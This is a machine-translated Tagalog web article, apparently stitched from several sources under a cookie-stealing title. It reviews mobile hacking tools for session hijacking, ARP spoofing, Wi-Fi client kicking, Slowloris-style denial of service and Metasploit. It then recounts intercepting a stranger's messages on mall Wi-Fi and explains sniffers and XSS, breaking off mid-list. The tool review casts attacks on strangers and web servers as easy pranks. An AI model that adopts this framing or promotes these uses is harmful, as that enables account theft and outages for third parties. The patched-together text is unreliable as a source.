Paano magnakaw ng cookies gamit ang wifi. Mga pamamaraan para sa pagnanakaw ng cookies. Pag-sniff ng data sa ibang mga program

"Isang smartphone na may mga tool sa pag-hack? Walang ganyanan,” kamakailan lang sana ay sasabihin namin sa iyo. Posibleng ilunsad ang ilan sa mga karaniwang tool para sa pagpapatupad ng mga pag-atake lamang sa ilang Maemo. Ngayon, maraming pamilyar na tool ang na-port sa iOS at Android, at ang ilang hack-tool ay espesyal na isinulat para sa mobile environment. Maaari bang palitan ng isang smartphone ang isang laptop sa mga pagsubok sa pagtagos? Nagpasya kaming suriin ito.

ANDROID

Ang Android ay isang sikat na platform hindi lamang para sa mga mortal, kundi para din sa mga tamang tao. Ang bilang ng mga kapaki-pakinabang na ][-utility dito ay wala sa mga chart. Para dito maaari naming pasalamatan ang mga ugat ng UNIX ng system - ito ay lubos na pinasimple ang pag-port ng maraming mga tool sa Android. Sa kasamaang palad, hindi pinapayagan ng Google ang ilan sa mga ito sa Play Store, kaya kakailanganin mong manu-manong i-install ang kaukulang APK. Gayundin, ang ilang mga utility ay nangangailangan ng maximum na access sa system (halimbawa, ang iptables firewall), kaya dapat mong pangalagaan ang root access nang maaga. Ang bawat tagagawa ay gumagamit ng sarili nitong teknolohiya dito, ngunit ang paghahanap ng mga kinakailangang tagubilin ay medyo madali. Ang isang mahusay na hanay ng mga HOWTO ay pinagsama-sama ng mapagkukunan ng LifeHacker (bit.ly/eWgDlu). Gayunpaman, kung hindi ka makahanap ng isang modelo dito, ang forum ng XDA-Developers (www.xda-developers.com) ay laging sumasagip, kung saan makakahanap ka ng iba't ibang impormasyon sa halos anumang modelo ng Android phone. Sa isang paraan o iba pa, gagana ang ilan sa mga utility na inilarawan sa ibaba nang walang root access.

Simulan natin ang pagsusuri sa isang hindi pangkaraniwang manager ng package. Tinatawag ito ng mga developer na "mga utility para sa mga superuser," at hindi ito malayo sa katotohanan. Pagkatapos i-install ang BotBrew, makakakuha ka ng repository kung saan maaari kang mag-download ng malaking bilang ng mga pamilyar na tool na pinagsama-sama para sa Android. Kabilang sa mga ito: Python at Ruby interpreter para sa pagpapatakbo ng maraming tool na nakasulat sa mga ito, tcpdump sniffer at Nmap scanner para sa network analysis, Git at Subversion para sa pagtatrabaho sa mga version control system, at marami pang iba.

Mga scanner ng network

Ang isang hindi kapansin-pansing smartphone, na, hindi tulad ng isang laptop, ay madaling magkasya sa isang bulsa at hindi kailanman nagdudulot ng hinala, ay maaaring maging kapaki-pakinabang para sa paggalugad ng network. Nasabi na namin sa itaas kung paano mo mai-install ang Nmap, ngunit may isa pang pagpipilian. Ang PIPS ay isang port ng Nmap scanner na partikular na inangkop para sa Android, kahit na hindi opisyal. Nangangahulugan ito na mabilis kang makakahanap ng mga aktibong device sa network, matukoy ang kanilang OS gamit ang mga opsyon sa fingerprinting, magsagawa ng port scan - sa madaling salita, gawin ang lahat na kaya ng Nmap.

Mayroong dalawang problema sa paggamit ng Nmap, sa kabila ng lahat ng kapangyarihan nito. Una, ang mga parameter para sa pag-scan ay ipinadala sa pamamagitan ng mga key ng paglulunsad, na hindi mo lamang dapat malaman, ngunit maaari ring makapasok gamit ang isang hindi maginhawang mobile keyboard. At pangalawa, ang mga resulta ng pag-scan sa output ng console ay hindi kasinglinaw ng gusto namin. Ang Fing scanner ay walang mga pagkukulang na ito; napakabilis nitong ini-scan ang network, ginagawa ang fingerprinting, at pagkatapos ay ipinapakita sa isang malinaw na anyo ang isang listahan ng lahat ng magagamit na mga device, na hinahati ang mga ito ayon sa uri (router, desktop, iPhone, at iba pa). Kasabay nito, para sa bawat host maaari mong mabilis na tingnan ang isang listahan ng mga bukas na port. Bukod dito, mula dito maaari kang kumonekta, sabihin, sa FTP, gamit ang FTP client na naka-install sa system - napaka-maginhawa.

Pagdating sa pagsusuri ng isang partikular na host, ang NetAudit utility ay maaaring maging lubhang kailangan. Gumagana ito sa anumang Android device (kahit na hindi naka-root) at nagbibigay-daan sa iyo hindi lamang na mabilis na matukoy ang mga device sa network, ngunit upang suriin din ang mga ito gamit ang isang malaking database ng fingerprinting upang matukoy ang operating system, pati na rin ang mga CMS system na ginagamit sa web server. Mayroon na ngayong higit sa 3,000 digital fingerprint sa database.

Kung, sa kabaligtaran, kailangan mong magtrabaho sa isang mas mababang antas at maingat na suriin ang pagpapatakbo ng network, kung gayon hindi mo magagawa nang walang Net Tools. Ito ay isang kailangang-kailangan na hanay ng mga kagamitan para sa gawain ng isang administrator ng system, na nagbibigay-daan sa iyo upang ganap na masuri ang pagpapatakbo ng network kung saan nakakonekta ang aparato. Ang package ay naglalaman ng higit sa 15 iba't ibang uri ng mga programa, tulad ng ping, traceroute, arp, dns, netstat, ruta.

Pagmamanipula ng trapiko

Ang tcpdump-based sniffer ay matapat na nagla-log ng lahat ng data sa isang pcap file, na maaaring pag-aralan gamit ang mga pamilyar na utility tulad ng Wireshark o Network Miner. Dahil walang mga kakayahan para sa mga pag-atake ng MITM na ipinatupad dito, ito ay isang kasangkapan para sa pagsusuri ng iyong trapiko. Halimbawa, ito ay isang mahusay na paraan upang pag-aralan kung ano ang mga program na naka-install sa iyong device mula sa mga kahina-hinalang repositoryo.

Kung pinag-uusapan natin ang tungkol sa mga application ng labanan para sa Android, kung gayon ang isa sa mga pinakakahindik-hindik ay ang FaceNiff, na nagpapatupad ng pagharang at pag-iniksyon sa mga na-intercept na web session. Sa pamamagitan ng pag-download ng APK package sa programa, maaari mong patakbuhin ang hack tool na ito sa halos anumang Android smartphone at, sa pamamagitan ng pagkonekta sa isang wireless network, harangin ang mga account ng iba't ibang serbisyo: Facebook, Twitter, VKontakte, at iba pa - higit sa sampu sa kabuuan. Isinasagawa ang pag-hijack ng session gamit ang ARP spoofing attack, ngunit ang pag-atake ay posible lamang sa mga hindi protektadong koneksyon (Ang FaceNiff ay hindi maaaring makapasok sa trapiko ng SSL). Upang pigilan ang daloy ng scriptdis, nilimitahan ng may-akda ang maximum na bilang ng mga session sa tatlo - pagkatapos ay kailangan mong makipag-ugnayan sa developer para sa isang espesyal na activation code.

Kung nais ng lumikha ng FaceNiff ng pera para sa paggamit nito, ang DroidSheep ay isang ganap na libreng tool na may parehong functionality. Totoo, hindi mo mahahanap ang distribution kit sa opisyal na website (ito ay dahil sa malupit na batas ng Germany tungkol sa mga kagamitan sa seguridad), ngunit maaari itong matagpuan sa Internet nang walang anumang mga problema. Ang pangunahing gawain ng utility ay upang maharang ang mga web session ng gumagamit ng mga sikat na social network, na ipinatupad gamit ang parehong ARP Spoofing. Ngunit may problema sa mga secure na koneksyon: tulad ng FaceNiff, ang DroidSheep ay tumangging gumana sa HTTPS protocol.

Ang utility na ito ay nagpapakita rin ng kawalan ng kapanatagan ng mga bukas na wireless network, ngunit sa isang bahagyang naiibang antas. Hindi nito hinaharang ang mga session ng user, ngunit pinapayagan ang HTTP na trapiko na dumaan sa sarili nito gamit ang isang spoofing attack, na nagsasagawa ng mga tinukoy na manipulasyon dito. Simula sa mga ordinaryong kalokohan (pinapalitan ang lahat ng mga larawan sa site ng mga mukha ng troll, pag-flip ng lahat ng mga imahe o, sabihin nating, pagpapalit ng mga resulta ng Google) at nagtatapos sa mga pag-atake sa phishing, kapag ang gumagamit ay binigyan ng mga pekeng pahina ng mga sikat na serbisyo tulad ng facebook.com, linkedin.com, vkontakte.ru at marami pang iba.

Kung tatanungin mo kung aling hack utility para sa Android ang pinakamakapangyarihan, malamang na walang mga kakumpitensya ang Anti. Ito ay isang tunay na pagsasama-sama ng hacker. Ang pangunahing gawain ng programa ay upang i-scan ang perimeter ng network. Susunod, ang iba't ibang mga module ay papasok sa labanan, sa tulong kung saan ipinatupad ang isang buong arsenal: pag-eavesdrop sa trapiko, pagsasagawa ng mga pag-atake ng MITM, at pagsasamantala sa mga nahanap na kahinaan. Totoo, mayroon ding mga disadvantages. Ang unang bagay na nakakakuha ng iyong mata ay ang pagsasamantala ng mga kahinaan ay isinasagawa lamang mula sa gitnang server ng programa, na matatagpuan sa Internet, bilang isang resulta kung saan maaari mong kalimutan ang tungkol sa mga target na walang panlabas na IP address.

Pag-tunnel ng trapiko

Ang kilalang file manager ay nasa mga smartphone na ngayon! Tulad ng sa desktop na bersyon, mayroong isang sistema ng mga plugin para sa pagkonekta sa iba't ibang mga direktoryo ng network, pati na rin ang isang canonical two-panel mode - lalo na maginhawa sa mga tablet.

Okay, ngunit paano mo matitiyak ang seguridad ng iyong data na ipinapadala sa isang bukas na wireless network? Bilang karagdagan sa VPN, na sinusuportahan ng Android out of the box, maaari kang lumikha ng isang SSH tunnel. Para sa layuning ito, mayroong isang kahanga-hangang SSH Tunnel utility, na nagbibigay-daan sa iyo na i-ruta ang trapiko ng mga napiling application o ang buong system sa kabuuan sa pamamagitan ng isang remote na SSH server.

Kadalasan ay kinakailangan na magpadala ng trapiko sa pamamagitan ng isang proxy o SOX, at sa kasong ito ay makakatulong ang ProxyDroid. Ito ay simple: pipiliin mo kung aling trapiko ng application ang gusto mong tunnel, at tumukoy ng isang proxy (HTTP/HTTPS/SOCKS4/SOCKS5 ay suportado). Kung kinakailangan ang pahintulot, sinusuportahan din ito ng ProxyDroid. Sa pamamagitan ng paraan, ang pagsasaayos ay maaaring maiugnay sa isang tiyak na wireless network sa pamamagitan ng paggawa ng iba't ibang mga setting para sa bawat isa sa kanila.

Mga wireless na network

Ang built-in na wireless network manager ay hindi masyadong nagbibigay-kaalaman. Kung kailangan mong mabilis na makakuha ng kumpletong larawan ng mga kalapit na access point, kung gayon ang utility ng Wifi Analyzer ay isang mahusay na pagpipilian. Hindi lamang nito ipapakita ang lahat ng kalapit na access point, ngunit ipapakita rin ang channel kung saan sila nagpapatakbo, ang kanilang MAC address at, higit sa lahat, ang uri ng encryption na ginamit (na nakita ang mga hinahangad na titik na "WEP", maaari nating ipagpalagay na ang pag-access sa ang secure na network ay ibinigay). Bilang karagdagan, ang utility ay perpekto kung kailangan mong mahanap kung saan pisikal na matatagpuan ang nais na access point, salamat sa isang visual signal strength indicator.

Ang utility na ito, gaya ng sinabi ng developer nito, ay maaaring maging kapaki-pakinabang kapag ang wireless network ay napuno sa kapasidad ng mga kliyenteng gumagamit ng buong channel, at sa sandaling ito kailangan ng isang mahusay na koneksyon at matatag na koneksyon. Pinapayagan ka ng WiFiKill na idiskonekta ang mga kliyente mula sa Internet alinman sa pili o batay sa isang partikular na pamantayan (halimbawa, posibleng pagtawanan ang lahat ng miyembro ng Yabloko). Ang programa ay nagsasagawa lamang ng pag-atake ng panggagaya ng ARP at nire-redirect ang lahat ng mga kliyente sa kanilang sarili. Ang algorithm na ito ay hangal na ipinatupad sa batayan ng mga iptable. Ito ang control panel para sa mga fast food wireless network :).

Pag-audit ng web application

Ang pagmamanipula ng mga kahilingan sa HTTP mula sa isang computer ay isang piraso ng cake mayroong isang malaking bilang ng mga utility at browser plugin para dito. Sa kaso ng isang smartphone, ang lahat ay medyo mas kumplikado. Tutulungan ka ng HTTP Query Builder na magpadala ng custom na HTTP na kahilingan kasama ang mga parameter na kailangan mo, halimbawa, ang gustong cookie o binagong User-Agent. Ang resulta ng kahilingan ay ipapakita sa isang karaniwang browser.

Kung ang site ay protektado ng password gamit ang Basic Access Authentication, maaari mong suriin ang pagiging maaasahan nito gamit ang Router Brute Force ADS 2 na utility Sa una, ang utility ay nilikha para sa mga brute force na password sa router admin panel, ngunit ito ay malinaw na ito ay maaaring ginagamit laban sa anumang iba pang mapagkukunan na may katulad na proteksyon. Gumagana ang utility, ngunit malinaw na krudo. Halimbawa, ang developer ay hindi nagbibigay ng brute force, ngunit brute force lang gamit ang isang diksyunaryo.

Tiyak na narinig mo ang tungkol sa isang kahindik-hindik na programa para sa hindi pagpapagana ng mga web server bilang Slowloris. Ang prinsipyo ng pagpapatakbo nito ay upang lumikha at humawak ng maximum na bilang ng mga koneksyon sa isang malayuang web server, kaya pinipigilan ang mga bagong kliyente na kumonekta dito. Kaya, ang AnDOSid ay isang analogue ng Slowloris sa iyong Android device! Sasabihin ko sa iyo ng isang lihim, sapat na ang dalawang daang koneksyon upang matiyak ang hindi matatag na operasyon ng bawat ikaapat na website na nagpapatakbo ng Apache web server. At lahat ng ito - mula sa iyong telepono!

Iba't ibang kagamitan

Kapag nagtatrabaho sa maraming mga web application at sinusuri ang kanilang lohika, karaniwan nang makatagpo ng data na ipinadala sa naka-encode na anyo, katulad ng Base64. Tutulungan ka ng Encode na i-decode ang data na ito at makita kung ano ang eksaktong nakaimbak dito. Marahil, sa pamamagitan ng pagpapalit ng mga quote, pag-encode ng mga ito pabalik sa Base64 at pagpapalit sa kanila sa URL ng site na iyong sinasaliksik, makukuha mo ang hinahangad na error sa query sa database.

Kung kailangan mo ng hexadecimal editor, mayroon ding isa para sa Android. Sa HexEditor maaari mong i-edit ang anumang mga file, kabilang ang mga system file, kung itataas mo ang mga karapatan ng program sa superuser. Isang mahusay na kapalit para sa isang karaniwang text editor, na nagbibigay-daan sa iyong madaling mahanap ang nais na piraso ng teksto at baguhin ito.

Malayong pag-access

Kapag mayroon ka nang access sa isang malayuang host, kailangan mo itong magamit. At para dito kailangan namin ng mga kliyente. Magsimula tayo sa SSH, kung saan ang ConnectBot ay ang de facto na pamantayan. Bilang karagdagan sa isang maginhawang interface, nagbibigay ito ng kakayahang ayusin ang mga secure na tunnel sa pamamagitan ng mga koneksyon sa SSH.

Isang kapaki-pakinabang na programa na nagbibigay-daan sa iyong kumonekta sa isang malayuang desktop sa pamamagitan ng mga serbisyo ng RDP o VNC. Lubos akong natutuwa na ito ay dalawang kliyente sa isa; hindi na kailangang gumamit ng iba't ibang mga tool para sa RDP at VNC.

Isang MIB browser na espesyal na isinulat para sa Android, kung saan maaari mong pamahalaan ang mga device sa network gamit ang SNMP protocol. Maaari itong maging kapaki-pakinabang para sa pagbuo ng isang vector ng pag-atake sa iba't ibang mga router, dahil ang karaniwang string ng komunidad (sa madaling salita, isang password sa pag-access) para sa pamamahala sa pamamagitan ng SNMP ay hindi pa nakansela.

iOS

Ang platform ng iOS ay hindi gaanong sikat sa mga developer ng security utility. Ngunit kung sa kaso ng mga karapatan sa ugat ng Android ay kailangan lamang para sa ilang mga application, pagkatapos ay sa mga aparatong Apple ang jailbreak ay halos palaging kinakailangan. Sa kabutihang palad, kahit na para sa pinakabagong firmware ng iDevices (5.1.1) ay mayroon nang tool na jailbreak. Kasama ng ganap na pag-access, makakakuha ka rin ng alternatibong application manager, Cydia, na naglalaman na ng maraming mga utility.

Paggawa gamit ang sistema

Ang unang bagay na gusto kong simulan ay ang pag-install ng terminal. Para sa mga malinaw na kadahilanan, hindi ito kasama sa karaniwang paghahatid ng mobile OS, ngunit kakailanganin namin ito upang patakbuhin ang mga utility ng console, na tatalakayin pa namin. Ang pinakamahusay na pagpapatupad ng isang terminal emulator ay MobileTerminal - sinusuportahan nito ang maramihang mga terminal, kontrolin ang mga galaw (halimbawa, para sa pagpapadala ng Control-C) at sa pangkalahatan ay kahanga-hanga sa pagiging maalalahanin nito.

Ang isa pang mas kumplikadong opsyon para makakuha ng access sa console ng device ay ang pag-install ng OpenSSH dito (ginagawa ito sa pamamagitan ng Cydia) at kumonekta dito nang lokal sa pamamagitan ng isang SSH client. Kung gagamitin mo ang tamang kliyente tulad ng iSSH, na may kamangha-manghang kontrol sa touch screen, kung gayon ang pamamaraang ito ay mas maginhawa kaysa sa paggamit ng MobileTerminal.

Interception ng data

Ngayon na mayroon ka nang access sa console, maaari mong subukan ang mga utility. Magsimula tayo sa Pirni, na lumabas sa kasaysayan bilang isang ganap na sniffer para sa iOS. Sa kasamaang-palad, hindi maaaring ilipat sa promiscuous mode na kinakailangan para sa normal na interception ng data ang structurally limited Wi-Fi module na binuo sa device. Kaya, upang maharang ang data, ginagamit ang klasikong ARP spoofing, sa tulong kung saan ang lahat ng trapiko ay ipinapasa sa mismong device. Ang karaniwang bersyon ng utility ay inilunsad mula sa console, kung saan, bilang karagdagan sa mga parameter ng pag-atake ng MITM, ang pangalan ng PCAP file ay tinukoy, kung saan naka-log ang lahat ng trapiko. Ang utility ay may mas advanced na bersyon - Pirni Pro, na ipinagmamalaki ang isang graphical na interface. Bukod dito, maaari nitong i-parse ang trapiko ng HTTP sa mabilisang at kahit na awtomatikong kunin ang mga interesanteng data mula dito (halimbawa, mga pag-login at password), gamit ang mga regular na expression na tinukoy sa mga setting.

Ang kilalang sniffer Intercepter-NG, na ilang beses naming isinulat, ay nagkaroon kamakailan ng bersyon ng console. Tulad ng sinabi ng may-akda, karamihan sa mga code ay nakasulat sa purong ANSI C, na kumikilos pareho sa halos anumang kapaligiran, kaya ang bersyon ng console ay gumana mula sa simula pareho sa desktop Windows, Linux at BSD, at sa mga mobile platform, kabilang ang iOS at Android . Ang bersyon ng console ay nagpapatupad na ng pag-agaw ng mga password na ipinadala sa iba't ibang mga protocol, pagharang sa mga instant messenger na mensahe (ICQ/Jabber at marami pang iba), pati na rin ang pagbawi ng mga file mula sa trapiko (HTTP/FTP/IMAP/POP3/SMTP/SMB). Kasabay nito, available ang mga function sa pag-scan ng network at mataas na kalidad na ARP Poison. Para sa tamang operasyon, kailangan mo munang i-install ang libpcap package sa pamamagitan ng Cydia (huwag kalimutang paganahin ang mga development package sa mga setting). Ang lahat ng mga tagubilin sa pagsisimula ay bumagsak sa pagtatakda ng mga tamang karapatan: chmod +x intercepter_ios. Susunod, kung patakbuhin mo ang sniffer nang walang mga parameter, lilitaw ang isang malinaw na interactive na interface ng Itercepter, na magbibigay-daan sa iyong maglunsad ng anumang mga pag-atake.

Mahirap paniwalaan, ngunit ang sopistikadong tool na ito para sa pagpapatupad ng mga pag-atake ng MITM ay sa wakas ay na-port sa iOS. Pagkatapos ng napakalaking dami ng trabaho, nagawa naming gumawa ng ganap na mobile port. Upang iligtas ang iyong sarili mula sa pagsasayaw gamit ang isang tamburin sa paligid ng mga dependency sa panahon ng self-compilation, mas mainam na mag-install ng isang naka-built na package gamit ang Cydia, pagkatapos idagdag ang theworm.altervista.org/cydia (TWRepo repository) bilang isang data source. Kasama rin sa kit ang etterlog utility, na tumutulong sa pagkuha ng iba't ibang uri ng kapaki-pakinabang na impormasyon mula sa nakolektang traffic dump (halimbawa, FTP access accounts).

Pagsusuri ng wireless network

Sa mga mas lumang bersyon ng iOS, ang mga manggagawa ay nagpatakbo ng aircrack at maaaring masira ang WEP key, ngunit sinuri namin: ang programa ay hindi gumagana sa mga bagong device. Samakatuwid, upang pag-aralan ang Wi-Fi, kailangan nating makuntento sa mga Wi-Fi scanner lamang. Sinusuri at ipinapakita ng WiFi Analyzer ang impormasyon tungkol sa lahat ng available na 802.11 network sa paligid mo, kabilang ang impormasyon tungkol sa SSID, mga channel, vendor, MAC address at mga uri ng pag-encrypt. Bumubuo ang utility ng mga visual na graph sa real time batay sa data na nasa himpapawid. Sa ganitong programa, madaling mahanap ang pisikal na lokasyon ng punto kung bigla mo itong nakalimutan, at, halimbawa, tingnan ang WPS PIN, na maaaring maging kapaki-pakinabang para sa pagkonekta.

Mga scanner ng network

Anong programa ang ginagamit ng anumang penetration tester saanman sa mundo, anuman ang mga layunin at layunin? Network scanner. At sa kaso ng iOS, malamang na ito ang pinakamalakas na toolkit ng Scany. Salamat sa isang hanay ng mga built-in na utility, mabilis kang makakakuha ng detalyadong larawan ng mga device sa network at, halimbawa, mga bukas na port. Bilang karagdagan, ang package ay may kasamang network testing utilities tulad ng ping, traceroute, nslookup.

Gayunpaman, mas gusto ng maraming tao si Fing. Ang scanner ay medyo simple at limitadong pag-andar, ngunit ito ay sapat na para sa unang kakilala sa network ng, sabihin nating, isang cafeteria :). Ang mga resulta ay nagpapakita ng impormasyon tungkol sa mga magagamit na serbisyo sa mga malalayong makina, MAC address at host name na konektado sa na-scan na network.

Mukhang nakalimutan na ng lahat si Nikto, pero bakit? Pagkatapos ng lahat, madali mong mai-install ang web vulnerability scanner na ito, na nakasulat sa isang script language (ibig sabihin, Perl), sa pamamagitan ng Cydia. Nangangahulugan ito na madali mo itong mailunsad sa iyong jailbroken na device mula sa terminal. Ikalulugod ni Nikto na magbigay sa iyo ng karagdagang impormasyon sa nasubok na mapagkukunan ng web. Bilang karagdagan, maaari mong idagdag ang iyong sariling mga lagda sa paghahanap sa database ng kaalaman nito gamit ang iyong sariling mga kamay.

Ang makapangyarihang tool na ito para sa awtomatikong pagsasamantala sa mga kahinaan ng SQL ay nakasulat sa Python, na nangangahulugang kapag na-install mo na ang interpreter, madali mo itong magagamit nang direkta mula sa iyong mobile device.

Remote control

Maraming mga network device (kabilang ang mga mamahaling router) ay pinamamahalaan gamit ang SNMP protocol. Binibigyang-daan ka ng utility na ito na mag-scan ng mga subnet para sa mga magagamit na serbisyo ng SNMP na may paunang kilalang mga halaga ng string ng komunidad (sa madaling salita, mga karaniwang password). Tandaan na ang paghahanap ng mga serbisyo ng SNMP na may karaniwang mga string ng komunidad (pampubliko/pribado) sa pagtatangkang makakuha ng access sa pamamahala ng device ay isang mahalagang bahagi ng anumang pagsubok sa pagtagos, kasama ang pagtukoy sa perimeter mismo at pagtukoy ng mga serbisyo.

Dalawang utility mula sa parehong tagagawa ang idinisenyo upang kumonekta sa isang malayuang desktop gamit ang mga protocol ng RDP at VNC. Maraming katulad na mga utility sa App Store, ngunit ito ang mga mas madaling gamitin.

Pagbawi ng password

Ang maalamat na programa na tumutulong sa milyun-milyong hacker sa buong mundo na "tandaan" ang kanilang password ay nai-port sa iOS. Ngayon ay maaari kang maghanap ng mga password para sa mga serbisyo tulad ng HTTP, FTP, TELNET, SSH, SMB, VNC, SMTP, POP3 at marami pang iba nang direkta mula sa iyong iPhone. Totoo, para sa isang mas epektibong pag-atake, mas mahusay na mag-stock ng mga mahusay na diksyunaryo ng brute force.

Alam mismo ng lahat ang kahinaan ng paggamit ng mga karaniwang password. Ang Pass Mule ay isang uri ng direktoryo na naglalaman ng lahat ng uri ng karaniwang mga login at password para sa mga network device. Maginhawang inayos ang mga ito ayon sa pangalan ng vendor, produkto, at modelo, kaya hindi magiging mahirap ang paghahanap ng kailangan mo. Ang programa ay sa halip ay idinisenyo upang makatipid ng oras sa paghahanap ng isang manu-manong para sa router, ang karaniwang pag-login at password kung saan kailangan mong malaman.

Pinagsasamantalahan ang mga kahinaan

Mahirap isipin ang isang mas maraming utility sa pag-hack kaysa Metasploit, at iyon ang nagtatapos sa aming pagsusuri ngayon. Ang Metasploit ay isang pakete ng iba't ibang mga tool na ang pangunahing gawain ay upang pagsamantalahan ang mga kahinaan sa software. Isipin: humigit-kumulang 1000 maaasahan, napatunayan at kinakailangang mga pagsasamantala sa pang-araw-araw na buhay ng isang pentester - mismo sa iyong smartphone! Sa tulong ng naturang tool maaari mo talagang itatag ang iyong sarili sa anumang network. Hindi lamang pinapayagan ka ng Metasploit na samantalahin ang mga kapintasan sa mga application ng server - magagamit din ang mga tool upang atakehin ang mga application ng kliyente (halimbawa, sa pamamagitan ng module ng Browser Autopwn, kapag ang isang combat payload ay ipinasok sa trapiko ng kliyente). Dito dapat sabihin na walang mobile na bersyon ng toolkit, gayunpaman, maaari kang mag-install ng karaniwang pakete sa isang Apple device gamit ang .

Ang mga gumagamit ng Internet ay napakawalang-ingat na ang pagkawala ng kumpidensyal na data ay kasingdali ng paghihimay ng mga peras. Ang publikasyong 42.tut ay nagsagawa ng isang eksperimento upang ipakita kung gaano karaming "mga butas" ang mayroon sa mga pampublikong Wi-Fi network. Ang konklusyon ay nakakadismaya: sinumang walang espesyal na kasanayan at kaalaman ay maaaring lumikha ng isang kumpletong dossier tungkol sa isang tao na gumagamit lamang ng isang bukas na wireless network.

Nag-install kami ng ilang application para sa eksperimento. Nag-iiba sila sa pag-andar, ngunit ang kanilang kakanyahan ay pareho - upang mangolekta ng lahat ng bagay na dumadaan sa network kung saan nakakonekta ang device. Wala sa mga programa ang nagpoposisyon sa kanilang sarili bilang "pirated", "hacker" o ilegal - maaari silang ma-download online nang walang anumang problema. Isinagawa ang eksperimento sa isang shopping center na may libreng Wi-Fi.

pagharang

Kumonekta kami sa Wi-Fi: walang password, ang pangalan ng network ay naglalaman ng salitang "libre". Nagsisimula kami sa pag-scan, ang isa sa mga programa ay agad na nakahanap ng 15 na koneksyon sa network. Para sa lahat maaari mong makita ang IP address, MAC address, para sa ilan - ang pangalan ng tagagawa ng device: Sony, Samsung, Apple, LG, HTC...

Nahanap namin ang laptop na "biktima" sa mga device. Kumonekta kami dito - ang data na dumadaan sa network ay nagsisimulang lumitaw sa screen. Ang lahat ng impormasyon ay nakaayos ayon sa oras, mayroong kahit isang built-in na viewer ng naharang na data.

Pagkakakilanlan ng gumagamit

Patuloy kaming nanonood. Ang isang online na laro ay malinaw na nagsimula sa laptop ng kanyang kasosyo: ang mga utos ng programa ay patuloy na ipinapadala sa network, ang impormasyon tungkol sa sitwasyon sa larangan ng digmaan ay natatanggap. Maaari mong makita ang mga palayaw ng iyong mga kalaban, ang kanilang mga antas ng laro at marami pang iba.

Dumating ang isang mensahe mula sa "VKontakte". Sa isa sa mga detalyadong detalye ng mensahe, nakita namin na ang user ID ay makikita sa bawat isa sa kanila. Kung i-paste mo ito sa browser, magbubukas ang account ng taong nakatanggap ng mensahe.

Ang "biktima" ay sa oras na ito ay nagsusulat ng tugon sa mensahe, at malinaw na walang ideya na kami ay nakatitig sa mga larawan sa kanyang account nang buong lakas. Ang isa sa mga application ng social network ay nagbibigay ng isang senyas - maaari naming pakinggan ang tunog na ito sa player.

Mga password at mensahe

Ang mga larawan at tunog ay hindi lahat na maaaring "ilipat" sa available na Wi-Fi. Halimbawa, ang isa sa mga programa ay may hiwalay na tab upang subaybayan ang mga sulat sa mga social network at instant messenger. Ang mga mensahe ay decrypted at pinagsunod-sunod ayon sa oras ng pagpapadala.

Ang pagpapakita ng sulat ng ibang tao ay higit sa mabuti at masama. Ngunit ito ay gumagana. Bilang isang paglalarawan, narito ang bahagi ng diyalogo ng may-akda ng teksto, na nakuha ng computer sa pagsubaybay mula sa "biktima" na aparato.

Ang isa pang programa ay hiwalay na "nag-iimbak" ng lahat ng cookies at impormasyon ng user, kabilang ang mga password. Sa kabutihang palad, sa naka-encrypt na anyo, ngunit agad itong nag-aalok upang mag-install ng isang utility na magde-decrypt sa kanila.

Mga konklusyon

Halos anumang impormasyon ay maaaring mawala sa Wi-Fi. Maraming mga pampublikong network ay hindi nagbibigay ng anumang proteksyon, at kung minsan kahit isang password. Nangangahulugan ito na maaaring harangin ng sinuman ang trapiko ng mga kasamahan, kaibigan o estranghero.

Ang pinaka-maaasahang paraan sa sitwasyong ito ay isa: huwag magpadala ng anumang mahalagang impormasyon sa pamamagitan ng mga pampublikong network. Halimbawa, huwag magpadala ng mga numero ng telepono at password sa mga mensahe at huwag magbayad gamit ang card ng pagbabayad sa labas ng bahay. Ang panganib ng pagkawala ng personal na data ay napakataas.

Mga cookies - impormasyon sa anyo ng isang text file na na-save sa computer ng user ng website. Naglalaman ng data ng pagpapatunay (pag-login/password, ID, numero ng telepono, address ng mailbox), mga setting ng user, katayuan sa pag-access. Naka-imbak sa profile ng browser.

Pag-hack ng cookie ay ang pagnanakaw (o "pag-hijack") ng session ng bisita ng web resource. Nagiging available ang pribadong impormasyon hindi lamang sa nagpadala at tatanggap, kundi pati na rin sa isang third party - ang taong nagsagawa ng pagharang.

Mga Tool at Teknik sa Pag-hack ng Cookie

Ang mga magnanakaw ng computer, tulad ng kanilang mga kasamahan sa totoong buhay, bilang karagdagan sa mga kasanayan, kagalingan ng kamay at kaalaman, siyempre, ay mayroon ding sariling mga tool - isang uri ng arsenal ng mga master key at probes. Tingnan natin ang pinakasikat na mga trick na ginagamit ng mga hacker upang kunin ang cookies mula sa mga user ng Internet.

Mga sniffer

Mga espesyal na programa para sa pagsubaybay at pagsusuri ng trapiko sa network. Ang kanilang pangalan ay nagmula sa Ingles na pandiwa na "sniff" (sniff), dahil. literal na "sniff out" ang mga ipinadalang packet sa pagitan ng mga node.

Ngunit ang mga umaatake ay gumagamit ng sniffer upang maharang ang data ng session, mga mensahe at iba pang kumpidensyal na impormasyon. Ang mga target ng kanilang mga pag-atake ay pangunahing mga hindi protektadong network, kung saan ipinapadala ang cookies sa isang bukas na sesyon ng HTTP, iyon ay, halos hindi sila naka-encrypt. (Ang pampublikong Wi-Fi ang pinaka-mahina sa bagay na ito.)

Upang mag-embed ng sniffer sa channel ng Internet sa pagitan ng node ng user at ng web server, ginagamit ang mga sumusunod na pamamaraan:

  • "pakikinig" sa mga interface ng network (hub, switch);
  • pagsasanga at pagkopya ng trapiko;
  • pagkonekta sa isang puwang ng channel ng network;
  • pagsusuri sa pamamagitan ng mga espesyal na pag-atake na nagre-redirect ng trapiko ng biktima sa sniffer (MAC-spoofing, IP-spoofing).

Ang abbreviation na XSS ay nangangahulugang Cross Site Scripting. Ginagamit upang atakehin ang mga website upang magnakaw ng data ng user.

Ang prinsipyo ng XSS ay ang mga sumusunod:

  • ang isang umaatake ay naglalagay ng malisyosong code (isang espesyal na disguised script) sa isang web page ng isang website, forum, o sa isang mensahe (halimbawa, kapag nauugnay sa isang social network);
  • ang biktima ay pumunta sa nahawaang pahina at isinaaktibo ang naka-install na code sa kanyang PC (mga pag-click, sumusunod sa isang link, atbp.);
  • sa turn, ang pinaandar na malisyosong code ay "nag-e-extract" ng kumpidensyal na data ng user mula sa browser (sa partikular, cookies) at ipinapadala ito sa web server ng umaatake.

Upang "magtanim" ng isang software na mekanismo ng XSS, ginagamit ng mga hacker ang lahat ng uri ng mga kahinaan sa mga web server, online na serbisyo at browser.

Ang lahat ng mga kahinaan ng XSS ay nahahati sa dalawang uri:

